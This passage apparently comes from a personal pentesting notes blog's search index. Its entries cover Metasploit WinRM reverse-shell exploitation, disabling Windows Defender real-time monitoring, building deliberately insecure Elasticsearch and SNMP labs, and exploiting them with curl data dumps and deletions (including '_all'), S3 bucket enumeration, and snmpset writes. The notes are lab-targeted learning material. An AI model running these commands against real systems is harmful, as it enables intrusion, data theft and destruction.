Administrator\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emsf auxiliary\u003cspan class=\"o\"\u003e(\u003c/span\u003escanner/winrm/winrm_cmd\u003cspan class=\"o\"\u003e)\u003c/span\u003e \u0026gt; \u003cspan class=\"nb\"\u003eset\u003c/span\u003e PASSWORD P@ssword1\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"nv\"\u003ePASSWORD\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e\u0026gt; P@ssword1\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003col start=\"3\"\u003e\n\u003cli\u003eBy default the command that will execute it is \u003ccode\u003eipconfig /all\u003c/code\u003e\n\u003cimg alt=\"we_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/07/we_2.png\"\u003e\n\u003cimg alt=\"we_3\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/07/we_3.png\"\u003e\u003c/li\u003e\n\u003cli\u003eRemember the setup of localuser for \u003ccode\u003ewinrm\u003c/code\u003e access where we gave access to the user \u003ccode\u003esysadmin\u003c/code\u003e , let\u0026rsquo;s try that:\n\u003cimg alt=\"we_4\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/07/we_4.png\"\u003e\n\u003cimg alt=\"we_5\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/07/we_5.png\"\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003cul\u003e\n\u003cli\u003eIt actually worked.\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003col\u003e\n\u003cli\u003eNow let\u0026rsquo;s try for Remote shell:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emsf6 \u0026gt; use exploit/windows/winrm/winrm_script_exec \n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emsf6 exploit\u003cspan 
class=\"o\"\u003e(\u003c/span\u003ewindows/winrm/winrm_script_exec\u003cspan class=\"o\"\u003e)\u003c/span\u003e \u0026gt; \u003cspan class=\"nb\"\u003eset\u003c/span\u003e RHOSTS 192.168.83.140 \n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emsf6 exploit\u003cspan class=\"o\"\u003e(\u003c/span\u003ewindows/winrm/winrm_script_exec\u003cspan class=\"o\"\u003e)\u003c/span\u003e \u0026gt; \u003cspan class=\"nb\"\u003eset\u003c/span\u003e LHOST 192.168.83.128\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003col start=\"2\"\u003e\n\u003cli\u003eAlso turn off \u003ccode\u003ereal time protection\u003c/code\u003e in your \u003ccode\u003ewindwos server\u003c/code\u003e , because it will \u003ccode\u003equarantine\u003c/code\u003e the execution.\u003c/li\u003e\n\u003c/ol\u003e\n\u003cul\u003e\n\u003cli\u003euse this command on \u003ccode\u003epowershell\u003c/code\u003e into your \u003ccode\u003eDC\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-powershell\" data-lang=\"powershell\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"nb\"\u003eSet-MpPreference\u003c/span\u003e \u003cspan class=\"n\"\u003e-DisableRealtimeMonitoring\u003c/span\u003e \u003cspan class=\"vm\"\u003e$true\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"we_6\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/07/we_6.png\"\u003e\n3. After selecting the exploit/windows/winrm/winrm_script_exec module, a \u003ccode\u003ereverse shell\u003c/code\u003e payload was automatically coupled with the exploit module within Metasploit.\n\u003cimg alt=\"we_7\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/07/we_7.png\"\u003e\n4. 
For the \u003ccode\u003eexploit/windows/winrm/winrm_script_exec\u003c/code\u003e module to have a better chance of success, force the exploit module to use the \u003ccode\u003eVBS CmdStager\u003c/code\u003e option in case your target is an old system, if not set it to \u003ccode\u003efalse\u003c/code\u003e only, let\u0026rsquo;s see the options:\u003c/p\u003e","title":"WinRM Exploitation"},{"content":"Requirements: Step 1: Install Java JDK 17 Elasticsearch is a Java application and requires a Java Development Kit (JDK) to run.\nOn your Windows Server 2019 VM, open the Edge browser you installed. Search for \u0026ldquo;OpenJDK 17 download/jdk 17 install\u0026rdquo; (Microsoft, Oracle, Red Hat etc are all good providers). Download the Windows x64 JDK as a .zip file (not the JRE). Once downloaded, extract the .zip file to a simple, permanent location, such as C:\\Program Files\\Java\\jdk-17. Step 2: Set the JAVA_HOME Environment Variable This tells Windows where to find the Java installation.\nIn the Windows Start Menu, type \u0026ldquo;environment\u0026rdquo; and select \u0026ldquo;Edit the system environment variables\u0026rdquo;. The \u0026ldquo;System Properties\u0026rdquo; window will open. Click the \u0026ldquo;Environment Variables\u0026hellip;\u0026rdquo; button at the bottom. In the bottom half, under \u0026ldquo;System variables\u0026rdquo;, click the \u0026ldquo;New\u0026hellip;\u0026rdquo; button. Variable name: JAVA_HOME Variable value: C:\\Program Files\\Java\\jdk-17 (or the path where you extracted the JDK) Click OK. Still in \u0026ldquo;System variables,\u0026rdquo; find the \u0026ldquo;Path\u0026rdquo; variable, select it, and click \u0026ldquo;Edit\u0026hellip;\u0026rdquo;. Click \u0026ldquo;New\u0026rdquo; and add a new entry: %JAVA_HOME%\\bin Click OK on all windows to close them. To verify the install: Open a new Command Prompt and type java -version. It should show \u0026ldquo;OpenJDK version 17\u0026hellip;\u0026rdquo;. 
if you are having this kind of error on accessing the env variables section: Then follow the second path:\npress win + R write sysdm.cpl and press enter. Then click on to advanced tab, click Environment variables . Now you can rejoin the previous step - 3 Step 3: Download and Unzip Elasticsearch Go to the official \u0026ldquo;Past Releases\u0026rdquo; page for Elasticsearch (search for \u0026ldquo;Elasticsearch past releases\u0026rdquo;). Find a modern version you want to use, for example, version 7.17.10 (a popular, stable release from the 7.x series) or any 8.x version. Click the \u0026ldquo;Download\u0026rdquo; link and get the Windows .zip file. Create a folder for your server, for example: C:\\Elasticsearch. Extract the entire contents of the .zip file into that folder. Your final path will look something like C:\\Elasticsearch\\elasticsearch-7.17.10. Step 4: Deliberately Misconfigure Elasticsearch This is the most important step. You will edit the main configuration file to add the \u0026ldquo;vulnerabilities.\u0026rdquo;\nNavigate into your Elasticsearch folder, then into the config sub-folder. Example: C:\\Elasticsearch\\elasticsearch-7.17.10\\config Open the file named elasticsearch.yml in a text editor like Notepad. This file is mostly comments (lines starting with #). Scroll to the very end of the file and add the following lines on a new line. (This avoids accidentally editing a commented-out line). # --- DANGEROUS SETTINGS FOR PENTEST LAB --- # 1. This disables all security (authentication, passwords, etc.) xpack.security.enabled: false xpack.security.transport.ssl.enabled: false xpack.security.http.ssl.enabled: false # 2. This binds Elasticsearch to ALL network adapters (0.0.0.0) # This is what makes it accessible from your Kali machine network.host: 0.0.0.0 # 3. This helps a single-node cluster start up (often needed for dev) discovery.type: single-node 4. 
Save the elasticsearch.yml file and close the text editor.\nStep 5: Run the Server Open a Command Prompt. Navigate to your Elasticsearch installation directory: cd C:\\Elasticsearch\\elasticsearch-7.17.10 Run the server using its batch file: bin\\elasticsearch.bat A lot of text will scroll by. Wait until you see messages indicating the server has started and is \u0026ldquo;publishing\u0026rdquo; its address. You may see a warning about security being disabled—this is expected and confirms your misconfiguration is working. Leave this command prompt open! Closing it will shut down the server. ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/07-performing-network-penetration-testing/08-setting-up-modern-vulnerable-elastic-search/","summary":"\u003ch2 id=\"requirements\"\u003eRequirements:\u003c/h2\u003e\n\u003ch3 id=\"step-1-install-java-jdk-17\"\u003eStep 1: Install Java JDK 17\u003c/h3\u003e\n\u003cp\u003eElasticsearch is a Java application and requires a Java Development Kit (JDK) to run.\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eOn your Windows Server 2019 VM, open the Edge browser you installed.\u003c/li\u003e\n\u003cli\u003eSearch for \u0026ldquo;OpenJDK 17 download/jdk 17 install\u0026rdquo; (Microsoft, Oracle, Red Hat etc are all good providers).\u003c/li\u003e\n\u003cli\u003eDownload the \u003cstrong\u003eWindows x64 JDK\u003c/strong\u003e as a \u003ccode\u003e.zip\u003c/code\u003e file (not the JRE).\u003c/li\u003e\n\u003cli\u003eOnce downloaded, extract the \u003ccode\u003e.zip\u003c/code\u003e file to a simple, permanent location, such as \u003ccode\u003eC:\\Program Files\\Java\\jdk-17\u003c/code\u003e.\n\u003cimg alt=\"es_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/08/es_1.png\"\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003chr\u003e\n\u003ch3 id=\"step-2-set-the-java_home-environment-variable\"\u003eStep 2: Set the \u003ccode\u003eJAVA_HOME\u003c/code\u003e Environment 
Variable\u003c/h3\u003e\n\u003cp\u003eThis tells Windows where to find the Java installation.\u003c/p\u003e","title":"Setting Up Modern Vulnerable ElasticSearch"},{"content":" As many organizations are using cloud-based email solutions such as Office 365 and Google Workspace for their employees, they are also synchronizing their Active Directory user database with the email services of their preferred cloud-based email provider. This means that an employee\u0026rsquo;s login username is the same as the username portion of their email address. When we get into any login page, there is a high chance that we can guess a username/email and later the page will give us a password incorrect error, through which we can identify that we have a valid username which can also be found in the target\u0026rsquo;s AD services. ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/04-active-information-gathering/08-performing-user-enum-using-noise-authentication/","summary":"\u003col\u003e\n\u003cli\u003eAs many organizations are using cloud-based email solutions such as Office 365 and Google Workspace for their employees, they are also synchronizing their \u003ccode\u003eActive Directory\u003c/code\u003e user database with the email services of their preferred cloud-based email provider. This means that an employee\u0026rsquo;s login username is the same as the username portion of their email address.\u003c/li\u003e\n\u003cli\u003eWhen we get into any login page, there is a high chance that we can guess a username/email and later the page will give us a \u003ccode\u003epassword incorrect\u003c/code\u003e error, through which we can identify that we have a valid username which can also be found in the target\u0026rsquo;s AD services.\u003c/li\u003e\n\u003c/ol\u003e","title":"User Enumeration Using Noise Authentication"},{"content":" Through the previous misconfigs, I should have full access to the elastic search database. 
Let\u0026rsquo;s see and exploit: Reconnaissance of the database: curl -X GET \u0026#34;http://192.168.83.140:9200\u0026#34; curl -X GET \u0026#34;http://192.168.83.140:9200/_cat/indices?v\u0026#34; _cat/indices: This is the API command to list all indices.\n?v: This makes the output \u0026ldquo;verbose\u0026rdquo; (shows headers), so it\u0026rsquo;s easy to read.\nWhy it\u0026rsquo;s dangerous: This tells the attacker the names of all your databases, such as prod-users or customer-logs. EXPLANATION OF THE INFO GATHERED FROM THE FIRST COMMAND: \u0026quot;name\u0026quot; : \u0026quot;DC1\u0026quot;\nWhat it is: The node name of this specific Elasticsearch server.\nExplanation: An Elasticsearch cluster can be made of many servers (nodes). You can name each one. When you started the server, it either found this name in the elasticsearch.yml file or, more likely, it defaulted to using the computer\u0026rsquo;s hostname (which you\u0026rsquo;ve probably named DC1 for \u0026ldquo;Domain Controller 1\u0026rdquo;).\nSeverity: Low. It confirms the server\u0026rsquo;s hostname, which is minor information.\n\u0026quot;cluster_name\u0026quot; : \u0026quot;elasticsearch\u0026quot;\nWhat it is: The name of the entire group of servers (the cluster). Explanation: By default, if you don\u0026rsquo;t specify a cluster name in the elasticsearch.yml file, it calls itself \u0026quot;elasticsearch\u0026quot;. In a real company, this would be something like \u0026quot;prod-analytics-cluster\u0026quot; or \u0026quot;security-logs\u0026quot;. Severity: Low. This just confirms you\u0026rsquo;re using the default name. \u0026quot;cluster_uuid\u0026quot; : \u0026quot;9I15HWO_R9uRAt_sfwczwg\u0026quot;\nWhat it is: A unique ID automatically generated for your entire cluster. Explanation: This ID is used internally by Elasticsearch to make sure nodes are joining the correct cluster and not a different one on the same network. Severity: Low. It\u0026rsquo;s just a random identifier. 
\u0026quot;version\u0026quot; : { ... }\nWhat it is: This is a JSON object (a block of nested information) that gives extremely precise details about the software version. Severity: Medium. This is very useful for an attacker. Let\u0026rsquo;s break down the inside of the version object: \u0026quot;number\u0026quot; : \u0026quot;7.17.10\u0026quot; What it is: The exact Elasticsearch version. Real-World Severity: Medium-High. This is the most important piece of information here for an attacker. They will immediately take this version number and search for known, published vulnerabilities (CVEs) that affect 7.17.10. Your version is modern, so it\u0026rsquo;s not vulnerable to the old RCE exploits, but an attacker would check. \u0026quot;build_flavor\u0026quot; : \u0026quot;default\u0026quot; What it is: Shows you installed the standard \u0026ldquo;default\u0026rdquo; build. Explanation: The other option is oss (Open Source Software), which would not include the commercial X-Pack features (like security). This confirms you have the full Elastic stack. Severity: Low. \u0026quot;build_type\u0026quot; : \u0026quot;zip\u0026quot; What it is: How the software was installed. Explanation: This tells an attacker you downloaded the .zip file and ran it manually, exactly like you did. Other options would be docker, deb (Debian), or rpm (Red Hat). Severity: Low. \u0026quot;build_hash\u0026quot; : \u0026quot;fecd68e...\u0026quot; What it is: The unique code \u0026ldquo;signature\u0026rdquo; (a git commit hash) for this exact build, used by developers. Severity: Low. \u0026quot;build_date\u0026quot; : \u0026quot;2023-04-23T...\u0026quot; What it is: The exact date and time this version was compiled by the developers. Severity: Low. \u0026quot;lucene_version\u0026quot; : \u0026quot;8.11.1\u0026quot; What it is: The version of Apache Lucene that this Elasticsearch version is built on top of. 
Explanation: Lucene is the underlying search library that does all the heavy lifting (indexing and searching). Elasticsearch is the user-friendly server and API built around it. Severity: Low to Medium. An advanced attacker might also check for vulnerabilities in this specific Lucene version. \u0026quot;minimum_wire_... and minimum_index_... What it is: These define the oldest versions of other Elasticsearch nodes or indices that this server can communicate with. Severity: Low. This is for internal cluster compatibility. Write / Modify Data (Planting Fake Data): Since there\u0026rsquo;s no security, you can write any data you want. Let\u0026rsquo;s create a new database called test_index and add a \u0026ldquo;hacked\u0026rdquo; record to it. curl -X PUT \u0026#34;http://192.168.83.140:9200/test_index/_doc/1\u0026#34; -H \u0026#39;Content-Type: application/json\u0026#39; -d\u0026#39; { \u0026#34;user\u0026#34;: \u0026#34;attacker\u0026#34;, \u0026#34;message\u0026#34;: \u0026#34;This database is wide open\u0026#34; } \u0026#39; PUT /test_index/_doc/1: This means \u0026ldquo;create or update document \u0026lsquo;1\u0026rsquo; in the 'test_index'. -H 'Content-Type: application/json': Tells the server we are sending it JSON data. -d '{...}': The actual data we are sending. Why it\u0026rsquo;s dangerous: An attacker can modify legitimate records (like changing a user\u0026rsquo;s password) or add fake data (like a fake admin account). Data Exfiltration (Stealing All Data): curl -X GET \u0026#34;http://192.168.83.140:9200/test_index/_search\u0026#34; # another command (alternate) curl -X GET \u0026#34;http://192.168.83.140:9200/test_index/_doc/1\u0026#34; _search: This is the main API for searching. With no filters, it just dumps the contents. Why it\u0026rsquo;s dangerous: This is how attackers steal millions of credit cards, user passwords, and private messages from misconfigured servers. 
Destruction (Deleting Everything): curl -X DELETE \u0026#34;http://192.168.83.140:9200/test_index\u0026#34; DELETE /test_index: This command permanently deletes the entire test_index. Why it\u0026rsquo;s dangerous: This is irreversible data loss. An attacker could run curl -X DELETE \u0026quot;http://192.168.83.140:9200/_all\u0026quot; to delete every single database on the server. Severity of the misconfigs: This misconfiguration (an open database on a public IP) is considered a CRITICAL vulnerability. It\u0026rsquo;s not a complex software bug; it\u0026rsquo;s the digital equivalent of leaving your company\u0026rsquo;s entire filing cabinet unlocked on the sidewalk.\nMethod 1: Reconnaissance (Listing Indices) Command: curl -X GET \u0026quot;.../_cat/indices?v\u0026quot; Information Gained: A complete list of all database names (e.g., test_index, prod_users, customer_logs). Real-World Severity: High Explanation: This is the attacker\u0026rsquo;s roadmap. They are no longer guessing. They immediately know where the \u0026ldquo;crown jewels\u0026rdquo; are. If they see an index named users, they know it contains user data. If they see credit_card_logs, they know it\u0026rsquo;s a high-value financial target. If they see patient_records, they know they\u0026rsquo;ve hit a healthcare provider and can steal highly sensitive medical data (HIPAA violation). Method 2: Write / Modify Data (Planting Fake Data) Command: curl -X PUT \u0026quot;.../test_index/_doc/1\u0026quot; -d '{...}' Information Gained: The ability to create new data or overwrite existing data. Real-World Severity: Critical Explanation: This is an attack on data integrity. The attacker can: Create Fake Accounts: Add a new document to the users index with their own admin credentials, giving them full access to the application. Modify Financials: Change the balance field in a bank\u0026rsquo;s database or alter a shipping address to steal goods. 
Website Defacement: Change the text of blog posts or product descriptions stored in the database to display their own message. Plant Malicious Payloads: Insert data containing a script (\u0026lt;script\u0026gt;.../script\u0026gt;). If a web application retrieves this data and displays it on a page without proper filtering, it could lead to XSS (Cross-Site Scripting) attacks against other users. Method 3: Data Exfiltration (Stealing All Data) Command: curl -X GET \u0026quot;.../test_index/_search\u0026quot; Information Gained: The entire contents of the database. Real-World Severity: Critical Explanation: This is the classic data breach you read about in the news. This is how millions of records are stolen. PII Theft: Stealing all user data (names, emails, phone numbers, addresses) for identity theft, phishing, and spam. Credential Theft: Stealing usernames and passwords. Even if passwords are hashed, attackers can crack weak ones offline and then take over accounts. Financial Theft: Stealing unencrypted credit card numbers, bank details, and transaction histories. Intellectual Property Theft: Stealing a company\u0026rsquo;s private business plans, source code, or internal documents. Method 4: Destruction (Deleting Everything) Command: curl -X DELETE \u0026quot;.../test_index\u0026quot; Information Gained: N/A. The goal is pure destruction. Real-World Severity: Critical Explanation: This is a Ransomware or Denial of Service (DoS) attack. Ransomware: This is the most common real-world attack on open databases. The attacker: Runs Method 3 to download a copy of all your data. Runs Method 4 to delete all your original data. Runs Method 2 to leave a single new record in the database named READ_ME containing a ransom note: \u0026ldquo;I have all your data. Pay 10 Bitcoin to this address to get it back. If you don\u0026rsquo;t, I will sell it.\u0026rdquo; Simple Destruction: A competitor or malicious actor simply deletes everything. 
If the company has no recent backups, it is instantly out of business. All user data, all product data, everything is gone forever. ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/07-performing-network-penetration-testing/09-exploiting-elastic-search-misconfigs/","summary":"\u003col\u003e\n\u003cli\u003eThrough the previous misconfigs, i should have full access to the elastic search database. Let\u0026rsquo;s see and exploit:\u003c/li\u003e\n\u003cli\u003eReconnaissance of the database:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecurl -X GET \u003cspan class=\"s2\"\u003e\u0026#34;http://192.168.83.140:9200\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecurl -X GET \u003cspan class=\"s2\"\u003e\u0026#34;http://192.168.83.140:9200/_cat/indices?v\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"ese_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/09/ese_1.png\"\u003e\n\u003cimg alt=\"ese_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/09/ese_2.png\"\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_cat/indices\u003c/code\u003e\u003c/strong\u003e: This is the API command to list all indices.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e?v\u003c/code\u003e\u003c/strong\u003e: This makes the output \u0026ldquo;verbose\u0026rdquo; (shows headers), so it\u0026rsquo;s easy to read.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003eWhy it\u0026rsquo;s dangerous:\u003c/strong\u003e This tells the attacker the names of all your databases, such as 
\u003ccode\u003eprod-users\u003c/code\u003e or \u003ccode\u003ecustomer-logs\u003c/code\u003e.\n\u003cem\u003eEXPLANATION OF THE INFO GATHERED FROM THE FIRST COMMAND:\u003c/em\u003e\n\u003cstrong\u003e\u003ccode\u003e\u0026quot;name\u0026quot; : \u0026quot;DC1\u0026quot;\u003c/code\u003e\u003c/strong\u003e\u003c/p\u003e","title":"Exploiting ElasticSearch Misconfigurations"},{"content":"There are some very well-known cloud providers within the industry: • Amazon Web Services (AWS) • Microsoft Azure • Google Cloud\nA common service that cloud providers usually offer to customers is a storage facility. The AWS storage facility is known as Simple Storage Service (S3). Whenever a customer enables the S3 service, a bucket is created. A bucket is a storage unit within the AWS platform where the customer can add or remove files. In Microsoft Azure, the file storage facility is known as Azure Files. Additionally, on Google Cloud, the storage facility is known as Google Cloud Storage.\nFor this exercise, we are going to use some free online learning resources from http://flaws.cloud. This is a learning environment that\u0026rsquo;s been created by an AWS security professional who is helping the community learn about security vulnerabilities that can exist within AWS S3 misconfigurations. Enumerating AWS S3: Installing s3scanner go install -v github.com/sa7mon/s3scanner@latest s3scanner -h Next, let\u0026rsquo;s use nslookup to obtain the IP addresses of the hosting server for the website: nslookup \u0026gt; flaws.cloud Next, we can attempt to retrieve the hostname that is mapped to the IP address by using the following commands within nslookup: An AWS S3 bucket\u0026rsquo;s URL format is usually in the form of https://bucketname.s3.Region.amazonaws.com. Therefore, by using the information from the URL, the following can be determined: Bucket name: s3-website Region: us-west-2 AWS S3 buckets are not only used to store data such as files. They are also used to host websites. 
Therefore, we can use flaws.cloud as a prefix to the AWS S3 bucket URL to get the following URL: http://flaws.cloud.s3-website-us-west-2.amazonaws.com/ Visiting this URL will present the same web page as http://flaws.cloud\nVerifying existence of bucket and the available permissions: s3scanner -bucket flaws.cloud Install AWS cli on kali: curl \u0026#34;https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip\u0026#34; -o \u0026#34;awscliv2.zip\u0026#34; sudo apt install unzip -y unzip awscliv2.zip sudo ./aws/install aws --version Then use the command:\naws configure # if you want to(optional) Follow the commands step by step.\nNext, let\u0026rsquo;s attempt to read/view the contents of the AWS S3 bucket using the information aws s3 ls s3://flaws.cloud/ --region us-west-2 --no-sign-request These are the files inside the AWS S3 bucket 6. Downloading the files:\nmkdir s3_Bucket_1 cd s3_Bucket_1 s3scanner dump --bucket flaws.cloud --dumpdir /home/kali/Desktop/a3_Bucket_1/ This command didn\u0026rsquo;t work for me, so i researched and got to know that i can do the same thing with aws cli too\naws s3 cp s3://flaws.cloud /home/kali/Desktop/s3_bucket_1 --recursive --no-sign-request 7. 
cat the contents of the secret file:\ncat secret-dd02c7c.html Additional reading: • Why is DNSSEC important?: https://www.icann.org/resources/pages/ dnssec-what-is-it-why-important-2019-03-05-en • DNS Zone Transfer Protocol: https://datatracker.ietf.org/doc/html/rfc5936 • Nmap reference guide: https://nmap.org/book/man.html • Information gathering with Metasploit: https://www.offensivesecurity.com/metasploit-unleashed/information-gathering/ • Amazon S3 user guide: https://docs.aws.amazon.com/AmazonS3/latest/userguide/Welcome.html • Amazon S3 Security: https://aws.amazon.com/s3/security/\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/04-active-information-gathering/09-finding-data-leaks-on-the-cloud/","summary":"\u003cp\u003eThere are some very well-known cloud providers within the industry:\n• Amazon Web Services (AWS)\n• Microsoft Azure\n• Google Cloud\u003c/p\u003e\n\u003cp\u003eA common service that cloud providers usually offer to customers is a storage facility. \u003cem\u003eThe AWS storage facility is known as Simple Storage Service (S3)\u003c/em\u003e. Whenever a customer enables the S3 service, a \u003cstrong\u003ebucket\u003c/strong\u003e is created. \u003cem\u003eA bucket is a storage unit within the AWS platform where the customer can add or remove files\u003c/em\u003e. In Microsoft Azure, the file storage facility is known as \u003cem\u003eAzure Files\u003c/em\u003e. Additionally, on Google Cloud, the storage facility is known as \u003cem\u003eGoogle Cloud Storage\u003c/em\u003e.\u003c/p\u003e","title":"Finding Data Leaks on the Cloud"},{"content":" Installing SNMP feature on windows server 2019: Using Server Manager: Open Server Manager. Click Manage in the top-right corner and select Add Roles and Features. Click Next until you reach the Features section. Scroll down and check the box for Simple Network Management Protocol (SNMP). Click Add Features in the pop-up window if prompted. 
Click Next and then Install Using PowerShell :\nOpen PowerShell as an Administrator. Run the following command: Install-WindowsFeature SNMP-Service -IncludeManagementTools Misconfiguration: Configure Vulnerable Settings The primary vulnerability in older SNMP versions (v1 and v2c) comes from using guessable community strings, which act like plaintext passwords. The most common default string is \u0026ldquo;public\u0026rdquo;.\nPress Win + R, type services.msc, and press Enter. Find the SNMP Service in the list, right-click it, and select Properties. Go to the Security tab. This is where you\u0026rsquo;ll set the weak configurations. Set a Weak Community String: Under the Accepted community names section, click Add. Set the Community rights to READ ONLY (or \u0026ldquo;READ WRITE\u0026rdquo; for a more critical vulnerability). In the Community Name box, type public. Click Add. Allow Access from Any Host: Below the community names, select the radio button for Accept SNMP packets from any host. Security Note: In a real environment, this is a major security risk. It allows any device on the network to query your server\u0026rsquo;s SNMP data. For secure setups, you would always choose \u0026ldquo;Accept SNMP packets from these hosts\u0026rdquo; and specify the IP address of your monitoring server. Click Apply and then OK. Restart the Service: Right-click the SNMP Service again in the services.msc window and select Restart to apply all your changes. Your server is now configured with the notoriously insecure \u0026ldquo;public\u0026rdquo; community string, accessible from any host on the network. 
This setup is ideal for testing vulnerability scanners (like Nmap or Nessus) to see how they detect this misconfiguration.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/07-performing-network-penetration-testing/10-snmp-misconguration/","summary":"\u003col\u003e\n\u003cli\u003eInstalling \u003ccode\u003eSNMP\u003c/code\u003e feature on windows server 2019:\n\u003cstrong\u003eUsing Server Manager:\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003eOpen \u003cstrong\u003eServer Manager\u003c/strong\u003e.\u003c/li\u003e\n\u003cli\u003eClick \u003cstrong\u003eManage\u003c/strong\u003e in the top-right corner and select \u003cstrong\u003eAdd Roles and Features\u003c/strong\u003e.\u003c/li\u003e\n\u003cli\u003eClick \u003cstrong\u003eNext\u003c/strong\u003e until you reach the \u003cstrong\u003eFeatures\u003c/strong\u003e section.\u003c/li\u003e\n\u003cli\u003eScroll down and check the box for \u003cstrong\u003eSimple Network Management Protocol (SNMP)\u003c/strong\u003e.\u003c/li\u003e\n\u003cli\u003eClick \u003cstrong\u003eAdd Features\u003c/strong\u003e in the pop-up window if prompted.\u003c/li\u003e\n\u003cli\u003eClick \u003cstrong\u003eNext\u003c/strong\u003e and then \u003cstrong\u003eInstall\u003c/strong\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003chr\u003e\n\u003cp\u003e\u003cstrong\u003eUsing PowerShell :\u003c/strong\u003e\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eOpen PowerShell as an Administrator.\u003c/li\u003e\n\u003cli\u003eRun the following command:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-powershell\" data-lang=\"powershell\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"nb\"\u003eInstall-WindowsFeature\u003c/span\u003e \u003cspan class=\"nb\"\u003eSNMP-Service\u003c/span\u003e \u003cspan 
class=\"n\"\u003e-IncludeManagementTools\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"sn_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/10/sn_1.png\"\u003e\u003c/p\u003e","title":"SNMP Misconfiguration"},{"content":" Scanning for SNMP service using NMAP : nmap -sU -sT -p U:161,T:161 192.168.83.140 2. Open msfconsole and use the module named snmp_enum 3. Then run it: It has dumped all the network information like services running, open TCP,UDP ports, network interfaces, file share information, storage information, file system info, device info, software components, processes Using tools other than metasploit: NMAP: nmap -sU -p 161 --script snmp-brute 192.168.83.140 2. snmpset :\nsnmpset -v2c -c public 192.168.83.140 1.3.6.1.2.1.1.4.0 s \u0026#34;Test Contact\u0026#34; -v2c: Specifies SNMP version 2c. -c public: Sets the community string to \u0026ldquo;public\u0026rdquo;. 1.3.6.1.2.1.1.4.0: The OID for sysContact.0. s: Specifies the data type is a \u0026ldquo;string\u0026rdquo;. \u0026quot;Test Contact\u0026quot;: The new value you are trying to write. Verifying that it\u0026rsquo;s been written: through CLI remotely: Using snmpget : snmpget -v2c -c public 192.168.83.140 1.3.6.1.2.1.1.4.0 using snmpwalk : snmpwalk -v2c -c public 192.168.83.140 1.3.6.1.2.1.1.4.0 3. snmp-check :\nsnmp-check 192.168.83.140 -c public -w snmp-check gave us the same amount of information metasploit gave earlier. How to Prevent This Attack The vulnerability is not in the SNMP SET command itself, but in the weak authentication that allows an attacker to use it. Here are the critical defenses:\nNever Use SNMPv1 or v2c with Read-Write Access: This is the root cause. These protocols send the community string (the password) in clear text. Upgrade to SNMPv3: This is the most important fix. SNMPv3 provides strong security by requiring usernames and passwords and, crucially, encrypting all communication. 
